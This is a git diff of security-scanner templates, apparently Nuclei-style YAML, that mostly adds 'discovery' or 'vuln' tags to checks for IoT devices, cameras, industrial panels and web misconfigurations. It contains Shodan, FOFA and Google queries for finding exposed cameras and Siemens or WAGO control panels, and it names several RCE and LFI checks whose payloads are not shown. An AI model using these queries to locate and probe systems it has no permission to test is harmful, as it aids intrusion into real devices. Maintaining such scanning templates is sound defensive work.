b/http/iot/liveview-axis-camera.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 2 - tags: axis,edb,iot + tags: axis,edb,iot,discovery http: - method: GET diff --git a/http/iot/loytec-device.yaml b/http/iot/loytec-device.yaml index f1693d89adb..f88cb71ea01 100644 --- a/http/iot/loytec-device.yaml +++ b/http/iot/loytec-device.yaml @@ -13,7 +13,7 @@ info: vendor: loytec product: lvis-3me shodan-query: "loytec" - tags: iot,loytec + tags: iot,loytec,discovery http: - method: GET diff --git a/http/iot/mobotix-guest-camera.yaml b/http/iot/mobotix-guest-camera.yaml index ea616b6db86..9e42b6b24b5 100644 --- a/http/iot/mobotix-guest-camera.yaml +++ b/http/iot/mobotix-guest-camera.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: iot,edb + tags: iot,edb,discovery http: - method: GET diff --git a/http/iot/moxa-vpn-router-panel.yaml b/http/iot/moxa-vpn-router-panel.yaml index 75bc1d9084a..5aabdf89c9e 100644 --- a/http/iot/moxa-vpn-router-panel.yaml +++ b/http/iot/moxa-vpn-router-panel.yaml @@ -10,7 +10,7 @@ info: shodan-query: http.favicon.hash:-234487373 verified: true max-request: 1 - tags: moxo,oncel,vpn,login,panel + tags: moxo,oncel,vpn,login,panel,discovery http: - method: GET diff --git a/http/iot/netgear-boarddataww-rce.yaml b/http/iot/netgear-boarddataww-rce.yaml index 847a4c7246a..4b3a6dbac93 100644 --- a/http/iot/netgear-boarddataww-rce.yaml +++ b/http/iot/netgear-boarddataww-rce.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 fofa-query: title=="Netgear" - tags: rce,netgear,iot,unauth + tags: rce,netgear,iot,unauth,vuln http: - raw: diff --git a/http/iot/netsurveillance-web.yaml b/http/iot/netsurveillance-web.yaml index 5e424985df2..baa2abad0d5 100644 --- a/http/iot/netsurveillance-web.yaml +++ b/http/iot/netsurveillance-web.yaml @@ -15,7 +15,7 @@ info: max-request: 1 shodan-query: http.title:"NETSurveillance WEB" google-query: intitle:"NETSurveillance WEB" - tags: tech,iot,edb + tags: tech,iot,edb,discovery http: - method: GET diff --git a/http/iot/network-camera-detect.yaml b/http/iot/network-camera-detect.yaml index 7d5f7e787fe..1f9b65e2c80 100644 --- a/http/iot/network-camera-detect.yaml +++ b/http/iot/network-camera-detect.yaml @@ -7,7 +7,7 @@ info: description: Network camera panel was detected. metadata: max-request: 1 - tags: iot + tags: iot,discovery http: - method: GET diff --git a/http/iot/novus-ip-camera.yaml b/http/iot/novus-ip-camera.yaml index 43a2d6c6053..887ee6f017e 100644 --- a/http/iot/novus-ip-camera.yaml +++ b/http/iot/novus-ip-camera.yaml @@ -15,7 +15,7 @@ info: verified: true max-request: 1 google-query: intitle:"NoVus IP camera" -com - tags: camera,novus,edb,iot,panel + tags: camera,novus,edb,iot,panel,discovery http: - method: GET diff --git a/http/iot/nuuno-network-login.yaml b/http/iot/nuuno-network-login.yaml index a717fdb776e..8b84184cb09 100644 --- a/http/iot/nuuno-network-login.yaml +++ b/http/iot/nuuno-network-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: iot,panel,nuuo,edb + tags: iot,panel,nuuo,edb,discovery http: - method: GET diff --git a/http/iot/octoprint-3dprinter-detect.yaml b/http/iot/octoprint-3dprinter-detect.yaml index 41920026768..e2d8cdc24a4 100644 --- a/http/iot/octoprint-3dprinter-detect.yaml +++ b/http/iot/octoprint-3dprinter-detect.yaml @@ -17,7 +17,7 @@ info: - http.title:"OctoPrint" product: octoprint vendor: octoprint - tags: iot,octoprint,panel + tags: iot,octoprint,panel,discovery http: - method: GET diff --git a/http/iot/open-mjpg-streamer.yaml b/http/iot/open-mjpg-streamer.yaml index a1080c789c6..b3a1c41d490 100755 --- a/http/iot/open-mjpg-streamer.yaml +++ b/http/iot/open-mjpg-streamer.yaml @@ -9,7 +9,7 @@ info: - https://github.com/jacksonliam/mjpg-streamer metadata: max-request: 1 - tags: iot,webcam + tags: iot,webcam,discovery http: - method: GET diff --git a/http/iot/panabit-ixcache-rce.yaml b/http/iot/panabit-ixcache-rce.yaml index edca02c2141..d536192ce81 100644 --- a/http/iot/panabit-ixcache-rce.yaml +++ b/http/iot/panabit-ixcache-rce.yaml @@ -13,7 +13,7 @@ info: max-request: 2 fofa-query: title="iXCache" veified: true - tags: panabit,rce,ixcache,intrusive,iot + tags: panabit,rce,ixcache,intrusive,iot,vuln http: - raw: diff --git a/http/iot/panasonic-network-management.yaml b/http/iot/panasonic-network-management.yaml index b97dbf8ce65..f0150affec5 100644 --- a/http/iot/panasonic-network-management.yaml +++ b/http/iot/panasonic-network-management.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: iot,camera,panasonic,edb + tags: iot,camera,panasonic,edb,discovery http: - method: GET diff --git a/http/iot/pqube-power-analyzers.yaml b/http/iot/pqube-power-analyzers.yaml index e2c7b1712ff..420773dc46d 100644 --- a/http/iot/pqube-power-analyzers.yaml +++ b/http/iot/pqube-power-analyzers.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: title:"PQube 3" - tags: iot,exposure + tags: iot,exposure,discovery http: - method: GET diff --git a/http/iot/qvisdvr-deserialization-rce.yaml b/http/iot/qvisdvr-deserialization-rce.yaml index 746bc7a433f..cbfef331d77 100644 --- a/http/iot/qvisdvr-deserialization-rce.yaml +++ b/http/iot/qvisdvr-deserialization-rce.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-77 metadata: max-request: 2 - tags: qvisdvr,rce,deserialization,jsf,iot + tags: qvisdvr,rce,deserialization,jsf,iot,vuln http: - raw: diff --git a/http/iot/raspberry-shake-config.yaml b/http/iot/raspberry-shake-config.yaml index b7762fd6ce7..3aa3647320a 100644 --- a/http/iot/raspberry-shake-config.yaml +++ b/http/iot/raspberry-shake-config.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:"Raspberry Shake Config" - tags: misconfig,unauth,iot,raspberry + tags: misconfig,unauth,iot,raspberry,discovery http: - method: GET diff --git a/http/iot/routeros-login.yaml b/http/iot/routeros-login.yaml index cfd4c312ec5..a62400c36b7 100644 --- a/http/iot/routeros-login.yaml +++ b/http/iot/routeros-login.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"RouterOS router configuration page" - tags: panel,router,routeros,iot + tags: panel,router,routeros,iot,discovery http: - method: GET diff --git a/http/iot/selea-ip-camera.yaml b/http/iot/selea-ip-camera.yaml index 30dddc1ee8e..9f85123074d 100644 --- a/http/iot/selea-ip-camera.yaml +++ b/http/iot/selea-ip-camera.yaml @@ -9,7 +9,7 @@ info: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5619.php metadata: max-request: 1 - tags: iot,selea,targa + tags: iot,selea,targa,discovery http: - method: GET diff --git a/http/iot/siemens-logo8-panel.yaml b/http/iot/siemens-logo8-panel.yaml index 7718947221f..71f2a768052 100644 --- a/http/iot/siemens-logo8-panel.yaml +++ b/http/iot/siemens-logo8-panel.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: html:"/logo_login.shtm" - tags: ics,siemens,panel,login + tags: ics,siemens,panel,login,discovery http: - method: GET diff --git a/http/iot/siemens-simatic-panel.yaml b/http/iot/siemens-simatic-panel.yaml index a83b057e96f..db623fb5476 100644 --- a/http/iot/siemens-simatic-panel.yaml +++ b/http/iot/siemens-simatic-panel.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: title:"Miniweb Start Page" - tags: ics,siemens,login,panel,miniweb + tags: ics,siemens,login,panel,miniweb,discovery http: - method: GET diff --git a/http/iot/snapdrop-detect.yaml b/http/iot/snapdrop-detect.yaml index 1ba0e506a47..8a7d435ef34 100644 --- a/http/iot/snapdrop-detect.yaml +++ b/http/iot/snapdrop-detect.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Snapdrop" - tags: iot,snapdrop + tags: iot,snapdrop,discovery http: - method: GET diff --git a/http/iot/stem-audio-table-private-keys.yaml b/http/iot/stem-audio-table-private-keys.yaml index b0d67eed259..8d1275f5ffb 100644 --- a/http/iot/stem-audio-table-private-keys.yaml +++ b/http/iot/stem-audio-table-private-keys.yaml @@ -9,7 +9,7 @@ info: - https://blog.grimm-co.com/2021/06/the-walls-have-ears.html metadata: max-request: 1 - tags: stem,config,exposure,iot + tags: stem,config,exposure,iot,vuln http: - method: GET diff --git a/http/iot/targa-camera-lfi.yaml b/http/iot/targa-camera-lfi.yaml index 6c41172037b..abff02cea28 100644 --- a/http/iot/targa-camera-lfi.yaml +++ b/http/iot/targa-camera-lfi.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-22 metadata: max-request: 1 - tags: targa,lfi,iot,camera,selea + tags: targa,lfi,iot,camera,selea,vuln http: - method: GET diff --git a/http/iot/targa-camera-ssrf.yaml b/http/iot/targa-camera-ssrf.yaml index 679d5b82a6d..210f447277f 100644 --- a/http/iot/targa-camera-ssrf.yaml +++ b/http/iot/targa-camera-ssrf.yaml @@ -9,7 +9,7 @@ info: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5617.php metadata: max-request: 1 - tags: targa,ssrf,oast,iot,camera,selea + tags: targa,ssrf,oast,iot,camera,selea,vuln http: - raw: diff --git a/http/iot/tenda-credential-disclosure.yaml b/http/iot/tenda-credential-disclosure.yaml index 86843a5a0cf..54633d47ac9 100644 --- a/http/iot/tenda-credential-disclosure.yaml +++ b/http/iot/tenda-credential-disclosure.yaml @@ -16,7 +16,7 @@ info: vendor: tendacn product: g0 fofa-query: "title=\"Tenda | LOGIN\" && country=\"CN\"" - tags: tenda,exposure,config,iot,router + tags: tenda,exposure,config,iot,router,discovery http: - raw: diff --git a/http/iot/ulanzi-clock.yaml b/http/iot/ulanzi-clock.yaml index d5bae11b220..b5518faf399 100644 --- a/http/iot/ulanzi-clock.yaml +++ b/http/iot/ulanzi-clock.yaml @@ -7,7 +7,7 @@ info: description: Ulanzi Clock panel was detected. metadata: max-request: 1 - tags: panel,ulanzi,iot + tags: panel,ulanzi,iot,discovery http: - method: GET diff --git a/http/iot/upnp-device.yaml b/http/iot/upnp-device.yaml index 2a5f33d3564..a4a3ad73143 100644 --- a/http/iot/upnp-device.yaml +++ b/http/iot/upnp-device.yaml @@ -9,7 +9,7 @@ info: - https://www.upnp.org/specs/basic/UPnP-basic-Basic-v1-Device.pdf metadata: max-request: 1 - tags: upnp,iot + tags: upnp,iot,discovery http: - method: GET diff --git a/http/iot/wago-webbased-panel.yaml b/http/iot/wago-webbased-panel.yaml index a7ae6ecd192..c7a513774e6 100644 --- a/http/iot/wago-webbased-panel.yaml +++ b/http/iot/wago-webbased-panel.yaml @@ -10,7 +10,7 @@ info: shodan-query: title:"WAGO Ethernet Web-based Management" verified: true max-request: 1 - tags: panel,login,wago,iot + tags: panel,login,wago,iot,discovery http: - method: GET diff --git a/http/iot/webcamxp-5.yaml b/http/iot/webcamxp-5.yaml index 41f38cf2cda..6c3cfd43b64 100644 --- a/http/iot/webcamxp-5.yaml +++ b/http/iot/webcamxp-5.yaml @@ -14,7 +14,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"webcamXP 5" - tags: iot,edb + tags: iot,edb,discovery http: - method: GET diff --git a/http/iot/webtools-home.yaml b/http/iot/webtools-home.yaml index d9cbe131a16..611d62c7fa6 100644 --- a/http/iot/webtools-home.yaml +++ b/http/iot/webtools-home.yaml @@ -8,7 +8,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Webtools" - tags: iot + tags: iot,discovery http: - method: GET diff --git a/http/iot/xp-webcam.yaml b/http/iot/xp-webcam.yaml index bed81416174..d82c825aed4 100644 --- a/http/iot/xp-webcam.yaml +++ b/http/iot/xp-webcam.yaml @@ -7,7 +7,7 @@ info: description: Searches for exposed webcams by querying the /mobile.html endpoint and the existence of webcamXP in the body. metadata: max-request: 1 - tags: webcam,iot + tags: webcam,iot,discovery http: - method: GET diff --git a/http/iot/zebra-printer-detect.yaml b/http/iot/zebra-printer-detect.yaml index 1408f004c15..5c6f8e39130 100644 --- a/http/iot/zebra-printer-detect.yaml +++ b/http/iot/zebra-printer-detect.yaml @@ -15,7 +15,7 @@ info: vendor: zebra product: zt220_firmware shodan-query: html:"Zebra Technologies" - tags: iot,zebra,printer + tags: iot,zebra,printer,discovery http: - method: GET diff --git a/http/miscellaneous/addeventlistener-detect.yaml b/http/miscellaneous/addeventlistener-detect.yaml index 0d7e1a9f0c9..b994f01b994 100644 --- a/http/miscellaneous/addeventlistener-detect.yaml +++ b/http/miscellaneous/addeventlistener-detect.yaml @@ -10,7 +10,7 @@ info: - https://portswigger.net/web-security/dom-based/controlling-the-web-message-source metadata: max-request: 1 - tags: miscellaneous,xss,misc + tags: miscellaneous,xss,misc,vuln http: - method: GET diff --git a/http/miscellaneous/apple-app-site-association.yaml b/http/miscellaneous/apple-app-site-association.yaml index c99acc6779d..25a0147424d 100644 --- a/http/miscellaneous/apple-app-site-association.yaml +++ b/http/miscellaneous/apple-app-site-association.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 3 - tags: miscellaneous,misc,apple + tags: miscellaneous,misc,apple,vuln http: - method: GET diff --git a/http/miscellaneous/assetlinks-detect.yaml b/http/miscellaneous/assetlinks-detect.yaml index 3ceeb519d2c..25ebd6b4d14 100644 --- a/http/miscellaneous/assetlinks-detect.yaml +++ b/http/miscellaneous/assetlinks-detect.yaml @@ -1,29 +1,29 @@ -id: assetlinks-detect - -info: - name: Android Asset Links Configuration - Detect - author: rxerium - severity: info - description: | - The .well-known/assetlinks.json file was found on the target server. This file is used by Android applications to establish verified app-to-web domain associations through the Digital Asset Links protocol. - reference: - - https://developer.android.com/training/app-links/verify-android-applinks - metadata: - verified: true - max-request: 1 - shodan-query: html:"assetlinks.json" - tags: misc,assetlinks,compliance,assetlinks - -http: - - method: GET - path: - - "{{BaseURL}}/.well-known/assetlinks.json" - - matchers: - - type: dsl - dsl: - - "status_code == 200" - - "contains(body, 'android_app')" - - "contains(content_type, 'application/json')" +id: assetlinks-detect + +info: + name: Android Asset Links Configuration - Detect + author: rxerium + severity: info + description: | + The .well-known/assetlinks.json file was found on the target server. This file is used by Android applications to establish verified app-to-web domain associations through the Digital Asset Links protocol. + reference: + - https://developer.android.com/training/app-links/verify-android-applinks + metadata: + verified: true + max-request: 1 + shodan-query: html:"assetlinks.json" + tags: misc,assetlinks,compliance,assetlinks,vuln + +http: + - method: GET + path: + - "{{BaseURL}}/.well-known/assetlinks.json" + + matchers: + - type: dsl + dsl: + - "status_code == 200" + - "contains(body, 'android_app')" + - "contains(content_type, 'application/json')" condition: and # digest: 4b0a00483046022100a19e82525fc591d7cbb5f444ab5b83ebc48996eed87e42fcf3c358a90426977f0221009b9b3d1a12dc61ac94638dbad68811b062d97c7a01f1e6cf5a3b733c368bd40b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/miscellaneous/atproto-did-exposure.yaml b/http/miscellaneous/atproto-did-exposure.yaml index 00610eadeb3..ab2cc746f53 100644 --- a/http/miscellaneous/atproto-did-exposure.yaml +++ b/http/miscellaneous/atproto-did-exposure.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 google-query: inurl:"/.well-known/atproto-did" - tags: well-known,atproto,bluesky,misc,identity,miscellaneous + tags: well-known,atproto,bluesky,misc,identity,miscellaneous,vuln http: - method: GET diff --git a/http/miscellaneous/aws-ecs-container-agent-tasks.yaml b/http/miscellaneous/aws-ecs-container-agent-tasks.yaml index 20d4c4aef36..27ed50ee0bf 100644 --- a/http/miscellaneous/aws-ecs-container-agent-tasks.yaml +++ b/http/miscellaneous/aws-ecs-container-agent-tasks.yaml @@ -9,7 +9,7 @@ info: - https://docs.aws.amazon.com/en_us/elasticbeanstalk/latest/dg/create_deploy_docker_ecstutorial.html#create_deploy_docker_ecstutorial_connect_inspect metadata: max-request: 2 - tags: miscellaneous,aws,docker,ec2,misc + tags: miscellaneous,aws,docker,ec2,misc,vuln http: - method: GET diff --git a/http/miscellaneous/azure-blob-core-detect.yaml b/http/miscellaneous/azure-blob-core-detect.yaml index 25f2d976bf5..a6180fea66a 100644 --- a/http/miscellaneous/azure-blob-core-detect.yaml +++ b/http/miscellaneous/azure-blob-core-detect.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: html:"blob.core.windows.net" - tags: azure,blob,detect + tags: azure,blob,detect,vuln http: - method: GET diff --git a/http/miscellaneous/balada-injector-malware.yaml b/http/miscellaneous/balada-injector-malware.yaml index 9a89da2c0b9..03733fa14c0 100644 --- a/http/miscellaneous/balada-injector-malware.yaml +++ b/http/miscellaneous/balada-injector-malware.yaml @@ -10,7 +10,7 @@ info: - https://blog.sucuri.net/2024/01/thousands-of-sites-with-popup-builder-compromised-by-balada-injector.html metadata: max-request: 1 - tags: malware,balada,misc,miscellaneous + tags: malware,balada,misc,miscellaneous,vuln http: - method: GET diff --git a/http/miscellaneous/clientaccesspolicy.yaml b/http/miscellaneous/clientaccesspolicy.yaml index ea613faf694..5959f83d4f3 100644 --- a/http/miscellaneous/clientaccesspolicy.yaml +++ b/http/miscellaneous/clientaccesspolicy.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: miscellaneous,misc + tags: miscellaneous,misc,vuln http: - method: GET diff --git a/http/miscellaneous/cloudflare-rocketloader-htmli.yaml b/http/miscellaneous/cloudflare-rocketloader-htmli.yaml index aaeccb7c201..38791ff7a1e 100644 --- a/http/miscellaneous/cloudflare-rocketloader-htmli.yaml +++ b/http/miscellaneous/cloudflare-rocketloader-htmli.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: misconfig,cloudflare,htmli,miscellaneous + tags: misconfig,cloudflare,htmli,miscellaneous,vuln http: - method: GET diff --git a/http/miscellaneous/credit-card-number-detect.yaml b/http/miscellaneous/credit-card-number-detect.yaml index 4a233e4dbaa..9b1bf55cefb 100644 --- a/http/miscellaneous/credit-card-number-detect.yaml +++ b/http/miscellaneous/credit-card-number-detect.yaml @@ -10,7 +10,7 @@ info: - https://www.tenable.com/plugins/was/98129 - https://en.wikipedia.org/wiki/Payment_card_number - https://stackoverflow.com/questions/9315647/regex-credit-card-number-tests - tags: credit,debit,card,payment,security,pci + tags: credit,debit,card,payment,security,pci,vuln http: - method: GET diff --git a/http/miscellaneous/crypto-mining-malware.yaml b/http/miscellaneous/crypto-mining-malware.yaml index 12757d21f35..375cad3e274 100644 --- a/http/miscellaneous/crypto-mining-malware.yaml +++ b/http/miscellaneous/crypto-mining-malware.yaml @@ -10,7 +10,7 @@ info: - https://github.com/xd4rker/MinerBlock/blob/master/assets/filters.txt metadata: max-request: 1 - tags: miscellaneous,malware,crypto,mining,misc,generic + tags: miscellaneous,malware,crypto,mining,misc,generic,vuln http: - method: GET diff --git a/http/miscellaneous/defaced-website-detect.yaml b/http/miscellaneous/defaced-website-detect.yaml index ec75bd15d91..aa115cf5752 100644 --- a/http/miscellaneous/defaced-website-detect.yaml +++ b/http/miscellaneous/defaced-website-detect.yaml @@ -9,7 +9,7 @@ info: verified: 'true' max-request: 1 shodan-query: http.title:"Hacked By" - tags: miscellaneous,defacement,misc + tags: miscellaneous,defacement,misc,vuln http: - method: GET diff --git a/http/miscellaneous/defacement-detect.yaml b/http/miscellaneous/defacement-detect.yaml index 5bbaa982e2a..f7da0bffc59 100644 --- a/http/miscellaneous/defacement-detect.yaml +++ b/http/miscellaneous/defacement-detect.yaml @@ -16,7 +16,7 @@ info: metadata: verified: true max-request: 85 - tags: misc,defacement,spam,hacktivism,fuzz,miscellaneous + tags: misc,defacement,spam,hacktivism,fuzz,miscellaneous,vuln http: - method: GET diff --git a/http/miscellaneous/detect-dns-over-https.yaml b/http/miscellaneous/detect-dns-over-https.yaml index 379c0174da7..ede2e8b887a 100644 --- a/http/miscellaneous/detect-dns-over-https.yaml +++ b/http/miscellaneous/detect-dns-over-https.yaml @@ -11,7 +11,7 @@ info: - https://developers.cloudflare.com/1.1.1.1/dns-over-https/wireformat metadata: max-request: 1 - tags: miscellaneous,dns,doh,misc + tags: miscellaneous,dns,doh,misc,vuln http: - method: GET diff --git a/http/miscellaneous/dir-listing.yaml b/http/miscellaneous/dir-listing.yaml index 9c23c1e38f3..bec6b12308b 100644 --- a/http/miscellaneous/dir-listing.yaml +++ b/http/miscellaneous/dir-listing.yaml @@ -8,7 +8,7 @@ info: - https://portswigger.net/kb/issues/00600100_directory-listing metadata: max-request: 1 - tags: miscellaneous,misc,generic + tags: miscellaneous,misc,generic,vuln http: - method: GET diff --git a/http/miscellaneous/directory-listing.yaml b/http/miscellaneous/directory-listing.yaml index de2765b3235..f91458c94da 100644 --- a/http/miscellaneous/directory-listing.yaml +++ b/http/miscellaneous/directory-listing.yaml @@ -14,7 +14,7 @@ info: - https://portswigger.net/kb/issues/00600100_directory-listing metadata: max-request: 2 - tags: misc,generic,misconfig,fuzz,miscellaneous + tags: misc,generic,misconfig,fuzz,miscellaneous,vuln flow: | function target_is_in_scope(url) { if (url.startsWith(template.http_1_host) || url.startsWith("/")) { diff --git a/http/miscellaneous/discord-invite-detect.yaml b/http/miscellaneous/discord-invite-detect.yaml index 2d88126163c..54c6ba01c64 100644 --- a/http/miscellaneous/discord-invite-detect.yaml +++ b/http/miscellaneous/discord-invite-detect.yaml @@ -1,33 +1,33 @@ -id: discord-invite-detect - -info: - name: Discord Invites for Users, Bots & Servers - Detect - author: rxerium - severity: info - description: | - Detect Discord Invites for users, bots and servers - reference: - - https://discord.com - tags: discord,info,osint,misc - -http: - - method: GET - path: - - "{{BaseURL}}" - - extractors: - - type: regex - name: discord-server-invite - regex: - - "https?:\\/\\/(?:www\\.)?discord\\.gg\\/([a-zA-Z0-9-]+)" - - - type: regex - name: discord-user-invite - regex: - - "https?:\\/\\/discord\\.com\\/users\\/([0-9]+)" - - - type: regex - name: discord-bot-invite - regex: +id: discord-invite-detect + +info: + name: Discord Invites for Users, Bots & Servers - Detect + author: rxerium + severity: info + description: | + Detect Discord Invites for users, bots and servers + reference: + - https://discord.com + tags: discord,info,osint,misc,vuln + +http: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + name: discord-server-invite + regex: + - "https?:\\/\\/(?:www\\.)?discord\\.gg\\/([a-zA-Z0-9-]+)" + + - type: regex + name: discord-user-invite + regex: + - "https?:\\/\\/discord\\.com\\/users\\/([0-9]+)" + + - type: regex + name: discord-bot-invite + regex: - "https?:\\/\\/discord\\.com\\/oauth2\\/authorize\\?client_id=([0-9]+)[^\\s\"']*" # digest: 4a0a0047304502202778b0cf137ee1f3a444aa4d9a6c2b5897a96eb266a9153db9c80738e23cab18022100a264be2d14bcd56c67096f0e85364f72703056650e3f903e50eb4d812fcafb46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/miscellaneous/dnt-policy-detect.yaml b/http/miscellaneous/dnt-policy-detect.yaml index a547ebe7955..f8270fdd37a 100644 --- a/http/miscellaneous/dnt-policy-detect.yaml +++ b/http/miscellaneous/dnt-policy-detect.yaml @@ -1,31 +1,31 @@ -id: dnt-policy-detect - -info: - name: DNT Policy Declaration - author: rxerium - severity: info - description: | - Detects a Do not Track policy. - reference: - - https://www.freeprivacypolicy.com/blog/privacy-policy-do-not-track-dnt/ - tags: privacy,dnt,detect,compliance,policy - -http: - - method: GET - path: - - "{{BaseURL}}/.well-known/dnt-policy.txt" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Do not track" - - "Policy" - - "Compliance" - condition: and - - - type: status - status: +id: dnt-policy-detect + +info: + name: DNT Policy Declaration + author: rxerium + severity: info + description: | + Detects a Do not Track policy. + reference: + - https://www.freeprivacypolicy.com/blog/privacy-policy-do-not-track-dnt/ + tags: privacy,dnt,detect,compliance,policy,vuln + +http: + - method: GET + path: + - "{{BaseURL}}/.well-known/dnt-policy.txt" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Do not track" + - "Policy" + - "Compliance" + condition: and + + - type: status + status: - 200 # digest: 490a00463044022058f9201d88dc3e15508aba68348879b158a56d4b5cbf37c2ef8af20de98da29902204ad693719efb1d87deeb72741ebe46cb8b27c46e534555dbae9d5caaabb90aef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/miscellaneous/email-extractor.yaml b/http/miscellaneous/email-extractor.yaml index dd54099c6a0..5d4e21aa364 100644 --- a/http/miscellaneous/email-extractor.yaml +++ b/http/miscellaneous/email-extractor.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: miscellaneous,misc,email,generic + tags: miscellaneous,misc,email,generic,discovery http: - method: GET diff --git a/http/miscellaneous/exposed-file-upload-form.yaml b/http/miscellaneous/exposed-file-upload-form.yaml index 24f1c7b3172..2d4a3b62ce7 100644 --- a/http/miscellaneous/exposed-file-upload-form.yaml +++ b/http/miscellaneous/exposed-file-upload-form.yaml @@ -12,7 +12,7 @@ info: vendor: creativedream_file_uploader_project product: creativedream_file_uploader shodan-query: http.html:"multipart/form-data" html:"file" - tags: miscellaneous,exposure,upload,form,misc,generic + tags: miscellaneous,exposure,upload,form,misc,generic,vuln http: - method: GET diff --git a/http/miscellaneous/external-service-interaction.yaml b/http/miscellaneous/external-service-interaction.yaml index 6e603a9323d..0d6f29cd692 100644 --- a/http/miscellaneous/external-service-interaction.yaml +++ b/http/miscellaneous/external-service-interaction.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-918,CWE-406 metadata: max-request: 1 - tags: miscellaneous,http,misc,oast + tags: miscellaneous,http,misc,oast,vuln http: - raw: diff --git a/http/miscellaneous/firebase-database-extractor.yaml b/http/miscellaneous/firebase-database-extractor.yaml index f35c93162ee..eef8c68ae5f 100644 --- a/http/miscellaneous/firebase-database-extractor.yaml +++ b/http/miscellaneous/firebase-database-extractor.yaml @@ -7,7 +7,7 @@ info: description: Extract Firebase Database metadata: max-request: 1 - tags: miscellaneous,firebase,misc + tags: miscellaneous,firebase,misc,vuln http: - method: GET diff --git a/http/miscellaneous/form-detection.yaml b/http/miscellaneous/form-detection.yaml index 5a3fcf20894..c4d0bad51e0 100644 --- a/http/miscellaneous/form-detection.yaml +++ b/http/miscellaneous/form-detection.yaml @@ -10,7 +10,7 @@ info: - https://github.com/dirtycoder0124/formcrawler metadata: max-request: 1 - tags: form,misc,miscellaneous + tags: form,misc,miscellaneous,vuln http: - method: GET diff --git a/http/miscellaneous/google-floc-disabled.yaml b/http/miscellaneous/google-floc-disabled.yaml index 9f465816603..a8ec9096700 100644 --- a/http/miscellaneous/google-floc-disabled.yaml +++ b/http/miscellaneous/google-floc-disabled.yaml @@ -9,7 +9,7 @@ info: - https://www.bleepingcomputer.com/news/security/github-disables-google-floc-user-tracking-on-its-website/ metadata: max-request: 1 - tags: miscellaneous,google,floc,misc + tags: miscellaneous,google,floc,misc,vuln http: - method: GET diff --git a/http/miscellaneous/gpc-json.yaml b/http/miscellaneous/gpc-json.yaml index a5c85ed6f75..3d342c1d180 100644 --- a/http/miscellaneous/gpc-json.yaml +++ b/http/miscellaneous/gpc-json.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 2 - tags: miscellaneous,misc,generic,gpc + tags: miscellaneous,misc,generic,gpc,vuln http: - method: GET diff --git a/http/miscellaneous/htaccess-config.yaml b/http/miscellaneous/htaccess-config.yaml index 2b01e4200c1..75f49998f7f 100644 --- a/http/miscellaneous/htaccess-config.yaml +++ b/http/miscellaneous/htaccess-config.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 6 - tags: miscellaneous,misc,config + tags: miscellaneous,misc,config,vuln http: - method: GET diff --git a/http/miscellaneous/http-trace.yaml b/http/miscellaneous/http-trace.yaml index bb96eef947f..4966b1b3fa1 100644 --- a/http/miscellaneous/http-trace.yaml +++ b/http/miscellaneous/http-trace.yaml @@ -8,7 +8,7 @@ info: - https://www.blackhillsinfosec.com/three-minutes-with-the-http-trace-method/ metadata: max-request: 2 - tags: miscellaneous,misc,generic + tags: miscellaneous,misc,generic,vuln http: - method: TRACE diff --git a/http/miscellaneous/joomla-htaccess.yaml b/http/miscellaneous/joomla-htaccess.yaml index 3894b9e36d3..364747f1a8d 100644 --- a/http/miscellaneous/joomla-htaccess.yaml +++ b/http/miscellaneous/joomla-htaccess.yaml @@ -7,7 +7,7 @@ info: description: Joomla! has an htaccess file to store configurations about HTTP config, directory listing, etc. metadata: max-request: 1 - tags: miscellaneous,misc,joomla + tags: miscellaneous,misc,joomla,vuln http: - method: GET diff --git a/http/miscellaneous/joomla-manifest-file.yaml b/http/miscellaneous/joomla-manifest-file.yaml index fc2b59e586d..ec669dc578a 100644 --- a/http/miscellaneous/joomla-manifest-file.yaml +++ b/http/miscellaneous/joomla-manifest-file.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: miscellaneous,misc,joomla + tags: miscellaneous,misc,joomla,vuln http: - method: GET diff --git a/http/miscellaneous/keybase-domain-owwnership-verification.yaml b/http/miscellaneous/keybase-domain-owwnership-verification.yaml index 69d23f6f067..36a3a044329 100644 --- a/http/miscellaneous/keybase-domain-owwnership-verification.yaml +++ b/http/miscellaneous/keybase-domain-owwnership-verification.yaml @@ -1,39 +1,39 @@ -id: keybase-domain-owwnership-verification - -info: - name: Keybase Domain Ownership Verification - author: rxerium - severity: info - description: | - Detects presence of keybase.txt used to prove domain ownership via Keybase identity. - reference: - - https://book.keybase.io/account#proofs - metadata: - verified: true - max-request: 1 - shodan-query: html:"keybase.txt" 